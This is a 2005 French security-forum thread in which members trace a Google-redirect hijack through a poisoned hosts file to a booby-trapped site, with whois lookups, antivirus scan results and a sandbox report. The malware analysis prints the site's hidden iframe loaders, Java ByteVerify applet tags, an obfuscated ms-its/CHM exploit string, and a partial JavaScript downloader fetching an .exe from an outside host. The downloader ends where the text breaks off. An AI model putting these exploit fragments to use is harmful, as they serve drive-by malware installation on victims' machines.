Google redirigé

Sécurité et insécurité. Virus, Trojans, Spywares, Failles etc. …

Modérateur: Modérateurs et Modératrices

Règles du forum
Assiste.com a suspendu l'assistance à la décontamination après presque 15 ans sur l'ancien forum puis celui-ci. Voir :

Procédure de décontamination 1 - Anti-malware
Décontamination anti-malwares

Procédure de décontamination 2 - Anti-malware et antivirus (La Manip)
La Manip - Procédure standard de décontamination

Entretien périodique d'un PC sous Windows
Entretien périodique d'un PC sous Windows

Protection des navigateurs, de la navigation et de la vie privée
Protéger le navigateur, la navigation et la vie privée

google rediriger

Messagede woonapy » 15 Juin 2005, 15:19

bonjour a tous,

impossible de venir sur le forum mais bon la j y suis

mon probleme a ete resolu apres la manip que cesar ma demandé de faire

en fixant c est ligne si

O18 - Protocol: bw+0 - {45606EFA-A87D-45FF-B6DF-A8318603D592} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
- O16 - DPF: {DB893839-10F0-4AF9-92FA-B23528F530AF} - http://deposito.hostance.net/dialer/503566.exe
- O16 - DPF: {084DAC27-6FA3-4F55-9005-033F2F102F5C} (ITPPDiagIE Class) - http://downloads.winwise.fr/Common/npwwg.cabO2
- BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dllO1
- Hosts: 66.199.231.174 www.google.com

plus de probleme de redirecetion de google

pr information tout les autres moteur de recherche ne me posait aucun probleme

uniquement google comme je le citais ds mon premier post
je m y connais pas comme vous mais je pense que l anti virus a bien fait son travail en me prevenant de l attaque
je fermais donc les fenetres et ne telechargeait absolument rien

je n ai pas trouver de trace du fichier gdnBE2053.exe sur mon DD ma question peut sembler bete sorry mais est-il possible qu il puisse changer de nom?

En tout cas d apres les explications de Pierre c est une sale crasse beurkkk

encore merci pour votre aide a tous
woonapy
 

Messagede césar » 15 Juin 2005, 16:30

bonjour woonapy,

je suis content de voir que tout c'est arrangé.
ce n'est pas une sale crasse que tu nous a fait découvrir, c'est les pyramides de Chéops !
il arrive que des internautes viennent nous voir au bord du formatage, mais là, c'est un véritable cas d'école ! un pur site mafieux comme on ne fait plus, une vraie pieuvre...

pour gdnbe2053.exe, je ne sais pas s'il a changé de nom, mais vu que, comme l'indique Pierre c'est un downloader, tu l'aurais remarqué s'il était là.
je pense en effet que ton av t'a évité le pire.
si tu veux te rassurer, tu peux faire quelques analyses, en mode sans échec et loggué en administrateur, avec divers antivirus et antitrojan (kapersky, norman, pestpatrol, ad-aware, etc...).
c'est une malveillance reconnue par beaucoup d'av, donc tu ne devrais pas avoir de mal à la trouver si elle est là.

@ plus.

ps : le forum a quelques problèmes de maintenance, comme tu as pu le remarquer.
césar
 
Messages: 2467
Inscription: 21 Déc 2003, 18:54

Messagede pierre » 15 Juin 2005, 19:35

Bonjour,

Poursuite de l'analyse du piège - ce n'est pas fini.
Remplace mes posts précédents que je détruit.



Analyse d'un site piégé à attaques fulgurantes :

Au départ, un parasite dont on n'a pas déterminé l'origine a modifié le comportement de l'ordinateur d'un internaute qui nous demande donc d'analyser ce symptome : chaque fois qu'il veut utiliser un moteur de recherche, par exemple Google, il est systématiquement redirrigé vers un site en anglais.

On s'apperçoit rapidement (à la lecture d'un log HijackThis - voir : http://assiste.com.free.fr/p/frameset/07_hijackthis.php ) que le hijack initial a consisté en la modification du DNS local (le fichier hosts : voir http://assiste.com.free.fr/p/internet_c ... /hosts.php ) et que désormais toutes les requêtes vers plusieurs domaines de Google, Yahoo!, MSN et astalavista sont redirrigées vers le serveur 66.199.231.174. Voici la modification de hosts:
66.199.231.174 www.google.com
66.199.231.174 google.com
66.199.231.174 www.google.co.uk
66.199.231.174 google.co.uk
66.199.231.174 www.google.ca
66.199.231.174 google.ca
66.199.231.174 www.google.es
66.199.231.174 google.es
66.199.231.174 www.google.de
66.199.231.174 google.de
66.199.231.174 www.google.fr
66.199.231.174 www.google.com.au
66.199.231.174 google.com.au
66.199.231.173 www.yahoo.com
66.199.231.173 yahoo.com
66.199.231.172 www.msn.com
66.199.231.172 msn.com
66.199.231.172 search.msn.com
66.199.231.171 astalavista.com
66.199.231.171 www.astalavista.com
66.199.231.171 astalavista.box.sk
66.199.231.171 www.astalavista.box.sk


Recherches d'informations sur la machine 66.199.231.10
  • Recherches de type IPWhois sur la machine 66.199.231.10
    66.199.231.10 = [ ]

    OrgName: EZZI.NET
    OrgID: EZZIN
    Address: 3500 Sunrise Highway
    Address: Suite T112
    City: Great River
    StateProv: NY
    PostalCode: 11739
    Country: US
    ReferralServer: rwhois: //rwhois.s2.ezzi.net: 4321
    NetRange: 66.199.224.0 - 66.199.255.255
    CIDR: 66.199.224.0/19
    NetName: NETBLK-EZZI
    NetHandle: NET-66-199-224-0-1
    Parent: NET-66-0-0-0-0
    NetType: Direct Allocation
    NameServer: S2.EZZI.NET
    NameServer: S1.EZZI.NET
    Comment:
    RegDate: 2003-08-22
    Updated: 2004-05-28
    NOCHandle: AD125-ARIN
    NOCName: Dhoon Ali
    NOCPhone: 1-866-438-3994
    NOCEmail: ali@ezzi.net

    OrgAbuseHandle: EAA12-ARIN
    OrgAbuseName: Ezzi Abuse Account
    OrgAbusePhone: 1-866-438-3994
    OrgAbuseEmail: abuse@ezzi.net

    OrgTechHandle: AD125-ARIN
    OrgTechName: Dhoon Ali
    OrgTechPhone: 1-866-438-3994
    OrgTechEmail: ali@ezzi.net

  • Recherches de type Blackhole sur la machine 66.199.231.10
    La machine en cause, 66.199.231.174, semble connue. Elle est présente dans diverses listes de blocage utilisées par les anti-spam. Elle a du donc servir de relais ou de serveur de messagerie. On la trouve dans
    DORKS(127.0.0.2)
    ABL(65.77.130.111)
    SPEWS(127.0.0.2)

    Et probablement dans les listes suivantes puisqu'elles s'appuient partiellement (consolidation) sur les premières.
    Realtime Blackhole List (RBL)
    Dialup User List (DUL)
    Relay Spam Stopper (RSS)
    RBL+ (RBL+)

  • Recherches de type NSLookup
    Je n'arrive pas à obtenir les noms des domaines hébergés sur ce serveur qui est bien protégé et ne fourni aucun détail sur lui-même.

  • Recherches de type NSLookup sur l'IPs Range de la machine 66.199.231.10
    Rien trouvé de significatif :
    J'ai voulu regarder quels domaines étaient hébergés sur les serveurs dans l'IPs range 66.199.231.0 à 66.199.231.255. J'ai procédé par sondages (manque de temps). Même sans entrer dans les domaines eux-mêmes, leurs noms sont "parlant". Les noms des domaines trouvés ne dénottent rien de particulier.

    Sur 66.199.231.10 il y a
    www.centrixphone.com
    www.centrixphone.info
    Accès refusé sur les 2 domaines

    Sur 66.199.231.14 il y a
    expresskall.com
    Time out

    Sur 66.199.231.18 il y a
    lidix.it
    finagros.com
    letturaweb.net

    Sur 66.199.231.42 il y a
    askabouna.com.
    avamina.com.
    azizdds.com.
    bestwebmortgage.com.
    centralbusinessinc.com.
    copt.org.
    coptic-church.com.
    coptic-orthodox-bible-society.com.
    copticcare.org.
    copticconvention.org.
    copticdeacon.com.
    copticdirectory.com.
    copticdomains.com.
    copticgreetingcards.com.
    copticlibrary.net.
    copticmall.com.
    copticmatch.net.
    copticpublication.com.
    copticsundayschool.com.
    cuteshopping.com.
    dentalpearl.com.
    designsbykaye.com.
    ecmarine.com.
    efairs.com.
    essentialgraphicdesign.com.
    familychiropractor.net.
    finds.net.
    foreignpatents.net.
    hamiltonfinance.com.
    hostinghome.net.
    i2consulting.com.
    i2consulting.net.
    i2web.net.
    icopts.com.
    icopts.net.
    ijobfair.net.
    ijobfairs.com.
    ijobfairs.net.
    insurancestore.com.
    insurwest.com.
    jobcities.com.
    koziolusa.com.
    kraftykids.com.
    libraryofcopts.com.
    libraryofcopts.org.
    mansfieldcom.com.
    mediachron.com.
    middleburydentist.com.
    myhotjob.com.
    nacopticarchdiocese.org.
    nacopts.org.
    ontrackcareer.com.
    ontrackcareer.net.
    orthodoxbible.com.
    papyruspaper.com.
    pentapolis.org.
    popekyrillos.com.
    pronchangedmylife.com.
    pronchangedmylife.net.
    publicinsurance.com.
    qual.com.
    robertgreenfieldltd.com.
    saintmina.net.
    saintmina.org.
    saintmoses.com.
    saintmosestheblack.com.
    sphinxgroup.net.
    stabanoub.net.
    stmina.com.
    stmoses.com.
    succeedinginyourbusiness.com.
    taranim.com.
    thenetworkplace.com.
    triunes.com.
    wckcpa.com.
    webchiropractor.net.
    webquill.com.
    werd2pron.com.
    werd2pron.net.

    Sur 66.199.231.58 il y a
    beingniceisawesome.com.
    ebayauctionsniper.biz.
    livesmall.com.
    lyricswiki.com.
    lyricswiki.org.
    pokermonsters.com

    Sur 66.199.231.60 il y a
    grapehome.com.
    krevice.com.
    laetans.com.
    lolephant.com.
    yocheckit.com.

    Sur 66.199.231.82 il y a
    ns1.half-asleep.com

    Sur 66.199.231.83 il y a
    mail.half-asleep.com

    Sur 66.199.231.84 il y a
    dnscache1.half-asleep.com

    Sur 66.199.231.91 il y a
    xtc.cx

    Sur 66.199.231.98 il y a
    icecap-websolutions.co.uk

    Sur 66.199.231.146 il y a
    ezzi.quevideos.com

    Sur 66.199.231.147 il y a
    ns1.quevideos.com

    Sur 66.199.231.148 il y a
    ns2.quevideos.com

    Sur 66.199.231.214 il y a
    ns2.nthweb.net


Recherches d'informations sur les domaines www.topsearch10.com et topsearch10.com
Je cherche également quelques infos sur le domaine www.topsearch10.com et je m'apperçoit qu'il n'est pas hébergé sur 66.199.231.174 comme je m'y attendais mais sur 64.124.222.236. Tant qu'à faire, je cherche également topsearch10.com et je m'apperçoit qu'il est hébergé sur 159.25.16.253.
On observe également que les adresses e-mail administratives des domaines sont sur les domaines en .ru
ctel.ru
ctel.ru9
  • Whois de www.topsearch10.com
    www.topsearch10.com = [ 64.124.222.236 ]
    domain: topsearch10.com
    status: lock
    organization: UmaxSearch Ltd
    email: noc@ctel.ru

    address: Arch. Makarios III str./22
    city: Nicosia
    state: --
    postal-code: 2406
    country: CY
    phone: 35799841423
    admin-c: noc@ctel.ru9

    tech-c: noc@ctel.ru9

    billing-c: noc@ctel.ru9

  • Whois de topsearch10.com
    topsearch10.com = [ 159.25.16.253 ]
    domain: topsearch10.com
    status: lock
    organization: UmaxSearch Ltd
    email: noc@ctel.ru

    address: Arch. Makarios III str./22
    city: Nicosia
    state: --
    postal-code: 2406
    country: CY
    phone: 35799841423
    admin-c: noc@ctel.ru9

    tech-c: noc@ctel.ru9

    billing-c: noc@ctel.ru9

  • Son registrar est
    inetnum: 159.25.0.0 - 159.25.255.255
    netname: GFTA
    descr: Computer Service Langenbach GmbH
    descr: Rathausufer 16
    descr: D-40213 Duesseldorf
    country: DE
    admin-c: CSL251-RIPE
    tech-c: CSL251-RIPE
    status: ASSIGNED PI "status:" definitions
    mnt-by: CSL-MNT
    source: RIPE # Filtered

  • Domaines sur le serveur 64.124.222.236
    topsearch10.com

  • Domaines sur le serveur 159.25.16.253
    aikona-marine.com
    arabthugs.com
    asthmaresourcebank.net
    australianholeinone.com
    camiones-concreto.com
    caucasianshepherds.org
    clan-classic.org
    communityjusticeincorporated.com
    elgeeshop.com
    elisabethsitar.com
    elsenham.net
    enfim.com
    faucheries.com
    freeviewantenna.com
    frenchrealtors.com
    haircarry.com
    horisontti.info
    isomanagementsystems.info
    isostore.biz
    jpegmag.com
    kcpaa.com
    kirkkonummi.biz
    kybernet.net
    matthewstoller.com
    mommersteeg.net
    mpa2.com
    mselectronics.biz
    nescon.info
    osceolahomefinder.com
    peppermint-lounge.com
    porteros-automaticos.com
    prismcharity.org
    skincheck.biz
    sofies.net
    stockguardian.com
    t10br.com
    the-evidence-eraser.com
    wisguaranteedsale.com

    Tout de suite, saute aux yeux, le domaine the-evidence-eraser.com (promotion crapuleuse des produits evidence-eliminator. Voir http://assiste.com.free.fr/p/faux_utili ... inator.php



Conclusion : L'attaquant est
>>> UmaxSearch Ltd <<<
Société installée à Nicosie
(Ile de Chypre)




Analyse de l'attaque
Analyse du site piégé, en partant de la redirection forcée trouvée dans hosts. Précautions : Les précautions suivantes sont prises ce qui peut nous empêcher de voir certains autres pièges mais ce qui suit est déjà pas mal :
sous Win XP Pro full patch
sous pare-feu et antivirus
sous firefox (donc pas d'ActiveX possible)
Réglages de Firefox :
  • Pop-up bloquées,
  • Interdiction aux sites d'installer des logiciels
  • Chargement d'images uniquement depuis le site visité
  • Java désactivé
  • Javascript désactivé
D'autre part, les fichiers téléchargés pour analyse le sont dans un répertoire exclu des analyses par mes antivirus sinon ils sont détruits en temps réel


La numérotation en rouge, 1 , est de moi pour suivre la pyramide.

  • 1 http://66.199.231.174
    En allant sur http://66.199.231.174 le domaine vers lequel sont redirigés les moteurs de recherches par le hijack du DNS local, hosts, je tombe sur un de ces habituels pseudo portail que je reconnais désormais immédiatement comme appartenant à un gang e-maffieux quelconque. Il y a simultanément une tentative de télécharger et exécuter un fichier nommé gdnFR2053.exe. Donc, on efface tout et on recommence : J'écris une page html avec un lien vers http://66.199.231.174 et j'exécute cette page, puis je fais un clic droit sur le lien et télécharge le code source de la dite page http://66.199.231.174.htm
  • Code source de la page http://66.199.231.174.htm
    Elle est constituée de 2 parties : Un groupe de 8 frames cachés qui s'ouvrent chacun sur un serveur différent et un 9ème frame dans lequel s'affiche la page que nous voyons. Le but de la manoeuvre est donc de faire très vite - la technique est souvent utilisée légitimement par de très gros sites de contenus et s'appelle "Load balancing". Elle permet d'accélérer considérablement le chargement d'une page en répartissant les requêtes aux objets qui la composent sur divers serveurs. Ici cette technique est utilisée pour que l'attaque soit la plus rapide possible. Cette page commence donc par charger 9 autres pages dans 9 frames différents dont 8 invisibles à partir de 9 serveurs différents :
    1.1 <frame scrolling="no" noresize src="http://www.crazy-toolbar.com/home/julia/">
    1.2 <frame scrolling="no" noresize src="http://66.230.175.129/connect.cgi?id=2053">
    1.3 <frame scrolling="no" noresize src="http://www.globolook.com/v271/wow.html">
    1.4 <frame scrolling="no" noresize src="http://82.179.170.11/dia484/">
    1.5 <frame scrolling="no" noresize src="http://195.225.176.25/user.scripts/u207/dir71101380.cgi">
    1.6 <frame scrolling="no" noresize src="http://qck.cc/x/in.php?wm=2353">
    1.7 <frame scrolling="no" noresize src="http://www.loadcash.biz/adverts/87/1.htm">
    1.8 <frame scrolling="no" noresize src="http://ambush-script.com/ld/iframe.php?acc=chern">
    1.9 <frame noresize src="http://www.topsearch10.com/search.php?aid=39464&q=hydrocodone">


    Prenons les un par un
  • 1.1 http://www.crazy-toolbar.com/home/julia/"
    Cette page ouvre, à son tour, instantanément, 8 autres pages chargées dans 8 iFrames invisibles à partir du même serveur crazy-toolbar.com !!! C'est une pyramide !
    <html>
    <head>
    </head>
    <body>

    1.1.1 <iframe src="http://crazy-toolbar.com/new2/web.php?account=julia" width="1" height="1">
    1.1.2 <iframe src="http://crazy-toolbar.com/new11/accjulia/web.php?account=julia" width="1" height="1">
    1.1.3 <iframe src="http://crazy-toolbar.com/new12/web.php?account=julia" width="1" height="1">
    1.1.4 <iframe src="http://crazy-toolbar.com/new4/accjulia/web.php" width="1" height="1">
    1.1.5 <iframe src="http://crazy-toolbar.com/new13/accjulia/web.php" width="1" height="1">
    1.1.6 <iframe src="http://crazy-toolbar.com/new10/web.php?account=julia" width="1" height="1">
    1.1.7 <iframe src="http://crazy-toolbar.com/new7/web.php?account=julia" width="1" height="1">
    1.1.8 <iframe src="http://crazy-toolbar.com/new6/web.php?account=julia" width="1" height="1">
    </body>
    </html>[/size]


      Analyse des pages ouvertes à partir de 1.1
    • 1.1.1 http://crazy-toolbar.com/new2/web.php?account=julia
      Code source de la page chargée dans cet iFrame. Remarque : dans l'url, je vire le "julia" qui doit être l'identifiant du compte du webmaster bénéficiaire : le Webmaster du site piégé est payé par les éditeurs de parasites - ce n'est pas lui qui développe les parasites, il ne fait qu'écrire un site et en faire la promotion, par hijack éventuellement, afin de l'offrir en cheval de Troie à des éditeurs de parasites. Il est payé au nombre d'implantations des parasites).
      Code: Tout sélectionner
      [size=9]<html>
       <body>
        <OBJECT STYLE="display:none" DATA="http://crazy-toolbar.com/new2/hta.php?account=">
       </body>
      </html>[/size]

      Cette page en charge donc une autre. Je télécharge donc le contenu de la page http://crazy-toolbar.com/new2/hta.php. Il s'agit d'un script en Visual Basic (vbscript) que j'analyse.
      Analyse avec VirusTotal et avec Jotti.
      Analyse sous Unix
      AntiVir nothing
      ArcaVir Trojan.Dropper.Inor.Cq
      Avast nothing
      AVG Antivirus nothing
      BitDefender nothing
      ClamAV VBS.Inor.CQ
      Dr.Web Trojan.Inor
      F-Prot Antivirus nothing
      Fortinet nothing
      Kaspersky Anti-Virus Trojan-Dropper.VBS.Inor.cq
      NOD32 probably a variant of VBS/TrojanDropper.Inor.CQ (probable variant)
      Norman Virus Control VBS/GenDrp.C
      VBA32 nothing

      Analyse sous Windows
      AntiVir no virus found
      AVG no virus found
      Avira no virus found
      BitDefender no virus found
      ClamAV VBS.Inor.CQ
      DrWeb Trojan.Inor
      eTrust-Iris Win32/Bube.J
      eTrust-Vet no virus found
      Fortinet no virus found
      Ikarus no virus found
      Kaspersky Trojan-Dropper.VBS.Inor.cq
      McAfee VBS/Inor
      NOD32 probably a variant of VBS/TrojanDropper.Inor.CQ
      Norman VBS/GenDrp.C
      Panda VBS/Inor.gen
      Sybari Trojan-Dropper.VBS.Inor.cq
      Symantec no virus found
      TheHacker no virus found
      VBA32 no virus found

      C'est donc un dropper (lire http://assiste.com.free.fr/p/internet_a ... ropper.php )
    • 1.1.2 http://crazy-toolbar.com/new11/accjulia/web.php?account=julia
      Code source de la page chargée dans cet iFrame.
      Code: Tout sélectionner
      [size=9]<html>
       <head>
       </head>
       <body>
        <APPLET ARCHIVE="http://crazy-toolbar.com/new11/acc/jar.php?account=" CODE="Counter.class" WIDTH="1" HEIGHT="1"></APPLET>
       </body>
      </html>[/size]

      Ce page prétend charger et exécuter une applet JAVA. Je vais donc la chercher à http://crazy-toolbar.com/new11/acc/Counter.class
      Analyse avec VirusTotal et avec Jotti.
      Code: Tout sélectionner
      Analyse sous Unix
      AntiVir                          Java/Femad.1
      ArcaVir                     Trojan.Java.Femad
      Avast                       VBS:Malware
      AVG Antivirus                   Java/ByteVerify
      BitDefender              Java.Trojan.Exploit.Bytverify
      ClamAV                    Trojan.Counter.Bytverify
      Dr.Web                      Exploit.ByteVerify
      F-Prot Antivirus                 destructive program
      Fortinet                      JAV/BYTVerify.A-tr
      Kaspersky Anti-Virus       Trojan.Java.Femad
      NOD32                        Java/Femad.A
      Norman Virus Control        nothing
      VBA32                        Trojan.Java.Femad

      Analyse sous Windows
      AntiVir                       Java/Femad.1
      AVG                          Java/ByteVerify
      Avira                             Java/Femad.1
      BitDefender              Java.Trojan.Exploit.Bytverify
      ClamAV                        Trojan.Counter.Bytverify
      DrWeb                        Exploit.ByteVerify
      eTrust-Iris                Java/ByteVerify!Trojan
      eTrust-Vet                Java.ByteVerify!exploit
      Fortinet                         JAV/BYTVerify.A-tr
      Ikarus                        Trojan.Java.Femad
      Kaspersky                    Trojan.Java.Femad
      McAfee                        Exploit-ByteVerify
      NOD32                      Java/Femad.A
      Norman                        no virus found
      Panda                            Exploit/ByteVerify
      Sybari                         no virus found
      Symantec                      Trojan.ByteVerify
      TheHacker                    Exploit/ByteVerify
      VBA32                          Trojan.Java.Femad


      D'autre part, je tente d'ouvrir la page http://crazy-toolbar.com/new11/acc/jar.php?account=" CODE="Counter.class. J'ai un message d'erreur :
      Warning: copy(http://www.crazy-toolbar.com/soft.php?login=\" CODE=\"Counter.class&num=11) [function.copy]: failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in /usr/home/domains/crazy-toolbar.com/htdocs/new11/jar.php on line 15
      Abort pclzip.lib.php : Missing zlib extensions

      Donc je télécharge le contenu de la page http://www.crazy-toolbar.com/soft.php et l'analyse
      En le renommant en .txt il est possible de l'ouvrir avec notepad et de s'appercevoir que c'est un programme exécutable.
      Analyse avec VirusTotal et avec Jotti.
      Analyse sous Unix
      AntiVir VBS/Psyme.C.1
      ArcaVir Trojan.Dropper.Bube.J
      Avast Win32:Bube-B
      AVG Antivirus Win32/Bube
      BitDefender Win32.Bube.L
      ClamAV Trojan.W32.Bube.J
      Dr.Web Trojan.DownLoader.2102
      F-Prot Antivirus nothing
      Fortinet W32/Bube.I
      Kaspersky Anti-Virus Virus.Win32.Bube.l
      NOD32 Win32/Bube.L
      VBA32 Win32.Worm.Bube.l

      Analyse sous Windows
      AntiVir VBS/Psyme.C.1
      AVG Win32/Bube
      Avira VBS/Psyme.C.1
      BitDefender Win32.Bube.L
      ClamAV Trojan.W32.Bube.J
      DrWeb Trojan.DownLoader.2102
      eTrust-Iris Win32/Bube.J
      eTrust-Vet Win32.Bube.J
      Fortinet W32/Bube.I
      Ikarus Virus.Win32.Bube.L
      Kaspersky Virus.Win32.Bube.l
      McAfee W32/Bube.dr
      NOD32v2 Win32/Bube.L
      Norman W32/Malware
      Panda W32/Admincash.B
      Sybari Virus.Win32.Bube.l
      Symantec Trojan.Admincash.B
      TheHacker W32/Bube.dropper
      VBA32 Win32.Worm.Bube.l

      La sanbox de Norman fourni des informations interressantes sur le comportemant de ce parasite :
      Norman Virus Control Sandbox: W32/Malware; [ General information ]

      * **Locates window "NULL [class Progman]" on desktop.
      * **Locates window "NULL [class Shell_TrayWnd]" on desktop.
      * Creating several executable files on hard-drive.
      * File length: 8704 bytes.

      [ Changes to filesystem ]
      * Creates file C:\WINDOWS\SYSTEM\sample.exe.
      * Creates file C:\WINDOWS\SYSTEM\svhost.exe.
      * Creates file C:\WINDOWS\wininit.ini.
      * Creates file .\tasks.

      [ Changes to registry ]
      * Sets value "SelfLimit"="" in key "HKCU\Software\Microsoft\Internet Explorer\Main".
      * Sets value "SelfLimit"="" in key "HKLM\Software\Microsoft\Internet Explorer\Main".
      * Creates value "System backup"="C:\WINDOWS\SYSTEM\sample.exe" in key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
      * Creates value "System backup"="C:\WINDOWS\SYSTEM\sample.exe" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
      * Modifies value "FirewallDisableNotify"="" in key "HKLM\Software\Microsoft\Security Center".
      * Modifies value "UpdatesDisableNotify"="" in key "HKLM\Software\Microsoft\Security Center".
      * Modifies value "AntiVirusDisableNotify"="" in key "HKLM\Software\Microsoft\Security Center".

      [ Changes to system settings ]
      * Modifies profile key "run"="C:\WINDOWS\SYSTEM\svhost.exe" in section [Windows] of file C:\WINDOWS\WIN.INI.

      [ Network services ]
      * Opens URL: http://advadmin.biz/zachot.php?status=1 ... 2=5A&ver3=.
      * Opens URL: http://advadmin.biz/tasks.
      * Looks for an Internet connection.

      [ Process/window information ]
      * Creates a mutex bayan.
      * Will automatically restart after boot (I'll be back...).
      * Creates a mutex kgam.


    • 1.1.3 http://crazy-toolbar.com/new12/web.php?account=julia
      Code source de la page
      Code: Tout sélectionner
      [size=9]<HTML>
       <BODY>
        <APPLET ARCHIVE="http://crazy-toolbar.com/new12/classload.jar" CODE="GetAccess.class" WIDTH=1 HEIGHT=1>
         <PARAM NAME="ModulePath" VALUE="http://crazy-toolbar.com/soft.php?login=&num=12">
        </APPLET>
       </BODY>
      </HTML>[/size]


      Donc, allons télécharger http://crazy-toolbar.com/new12/classload.jar"
      Analyse avec VirusTotal et avec Jotti.
      Analyse sous Unix
      AntiVir TR/ClassLder.c.Java, TR/Forten.Java.2.B, TR/Forten.Java.2, TR/Dldr.OpenConn.F
      ArcaVir Trojan.Downloader.Openconnection.F
      Avast JS:ClassLoader-7
      AVG Antivirus Java/ByteVerify
      BitDefender Trojan.Java.Classloader.C
      ClamAV Java.ClassLoader.24564
      Dr.Web Exploit.ByteVerify
      F-Prot Antivirus destructive program
      Fortinet JAV/BYTVerify.A-tr
      Kaspersky Anti-Virus Trojan.Java.ClassLoader.c, Exploit.Java.Bytverify, Trojan.Java.ClassLoader.Dummy.a,
      Trojan-Downloader.Java.OpenConnection.v
      NOD32 Java/Exploit.Bytverify.F
      Norman Virus Control nothing
      VBA32 Trojan.Java.ClassLoader.c, Exploit.Java.Bytverify, Trojan.Java.ClassLoader.Dummy.a,
      TrojanDownloader.Java.OpenConnection.f

      Analyse sous Windows
      AntiVir TR/ClassLder.c.Java
      AVG Java/ByteVerify
      Avira TR/ClassLder.c.Java
      BitDefender Trojan.Java.Classloader.C
      ClamAV Java.ClassLoader.24564
      DrWeb Exploit.ByteVerify
      eTrust-Iris Java/Shinwow.Q!Jar!Trojan
      eTrust-Vet Java.ByteVerify!exploit
      Fortinet JAV/BYTVerify.A-tr
      Ikarus no virus found
      Kaspersky Trojan.Java.ClassLoader.c
      McAfee Exploit-ByteVerify
      NOD32v2 Java/Exploit.Bytverify.F
      Norman no virus found
      Panda Exploit/ByteVerify
      Sybari no virus found
      Symantec Trojan.ByteVerify
      TheHacker Exploit/ByteVerify
      VBA32 Trojan.Java.ClassLoader.c

      Allons télécharger http://crazy-toolbar.com/new12/GetAccess.class
      Analyse sous Unix
      AntiVir TR/ClassLder.c.Java
      ArcaVir Trojan.Downloader.Class
      Avast JS:ClassLoader-7
      AVG Antivirus Java/ByteVerify
      BitDefender Java.Trojan.Exploit.Bytverify
      ClamAV Java.ClassLoader.24564
      Dr.Web Exploit.ByteVerify
      F-Prot Antivirus destructive program
      Fortinet JAV/BYTVerify.A-tr
      Kaspersky Anti-Virus Trojan.Java.ClassLoader.c
      NOD32 Java/Exploit.Bytverify.F
      Norman Virus Control nothing
      VBA32 Trojan.Java.ClassLoader.c

      Analyse sous Windows
      AntiVir TR/ClassLder.c.Java
      AVG Java/ByteVerify
      Avira TR/ClassLder.c.Java
      BitDefender Java.Trojan.Exploit.Bytverify
      ClamAV Java.ClassLoader.24564
      DrWeb Exploit.ByteVerify
      eTrust-Iris Java/ClassLoader.c!Trojan
      eTrust-Vet Java.ByteVerify!exploit
      Fortinet JAV/BYTVerify.A-tr
      Ikarus Trojan.Java.ClassLoader.C
      Kaspersky Trojan.Java.ClassLoader.c
      McAfee Exploit-ByteVerify
      NOD32v2 Java/Exploit.Bytverify.F
      Norman no virus found
      Panda Exploit/ByteVerify
      Sybari no virus found
      Symantec Trojan.ByteVerify
      TheHacker Exploit/ByteVerify
      VBA32 Trojan.Java.ClassLoader.c

      Ce parasites va tenter d'exploiter une veille faille de sécurité corrigée par le vieux bulletin Microsoft MS03-011. Si vous êtes à jour de vos patchs de sécurité, cette attaque est sans effet.

    • 1.1.4 http://crazy-toolbar.com/new4/accjulia/web.php
      Cette page ne contiend que ce code
      Code: Tout sélectionner
      <textarea id="code" style="display:none;">
          <object data="&#109 ;s-its:mhtml:file://C:\foo.mht!${PATH}/exploit.chm::/exploit.htm" type="text/x-scriptlet"></object>
      </textarea>

      <script language="javascript">
          document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('/web.php'))));
      </script>

      Attention, il n'y a pas d'espace dans &#109 ; - j'en ajoute un sinon le code est traduit à la volée.
      Si on remplace le code &#109 ; par sa traduction, soit "m", on obtient
      ms-its:mhtml:file://C:\foo.mht!${PATH}/exploit.chm::/exploit.htm
      seulement voilà, écrit ainsi, les proxy (The proxomitron ou SpyBlocker) ou les antivirus s'en apperçoivent alors qu'ils passent à côté du &#109 ; !
      Cette attaque met en place l'exploitation d'une faille, vulnérabilité ADODB stream, de gestion des fichiers html embarqués dans les fichiers .chm (les fichiers .chm sont les fichiers d'aide (help) standard de Windows constitués de html compilé). L'attaque consiste donc à préparer une page d'attaque (un code html dans un fichier .chm) sur la machine attaquée puis a exploiter ceci depuis le serveur du site piégé.

      Ressources à propos de cette attaque
      http://www.derkeiler.com/Mailing-Lists/ ... /1758.html

      Une démonstration de l'attaque à
      http://ip3e83566f.speed.planet.nl/secur ... xploit.htm

      Symantec
      http://securityresponse.symantec.com/av ... oit.6.html

      Proof-of-concept trouvé dans le cache de Google mais l'original n'existe plus

      Ce qui suit peut être détecté par votre antivirus comme un code malicieux (appelé XMLid.Exploit ou Exploit-CodeBase ou encore Exploit.CodeBaseExec)

      The following proof-of-concept has been supplied:

      ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

      The following example demonstrates the exploitation of this issue:

      The attacker would create a script (ie; launch.html) containing a CLASSID exploit as a CHM such as:
      &lt;OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

      The attacker would then utilize another script tag to execute the launch.html such as:
      <IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
      SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
      SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
      SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

      Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:
      http://www.malware.com/junk-de-lux.html
      http://ip3e83566f.speed.planet.nl/secur ... xploit.htm

      Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

      Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:

      ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

      This issue is known to be exploited in the wild.

      (gerok @ Apr 7 2004, 08:38 AM)
      this is the html file in the chm...

      <script language="javascript">

      payloadURL = "http://siteher.com/1.exe";

      var x = new ActiveXObject("Microsoft.XMLHTTP");
      x.Open("GET",payloadURL,0);
      x.Send();

      var s = new ActiveXObject("ADODB.Stream");
      s.Mode = 3;
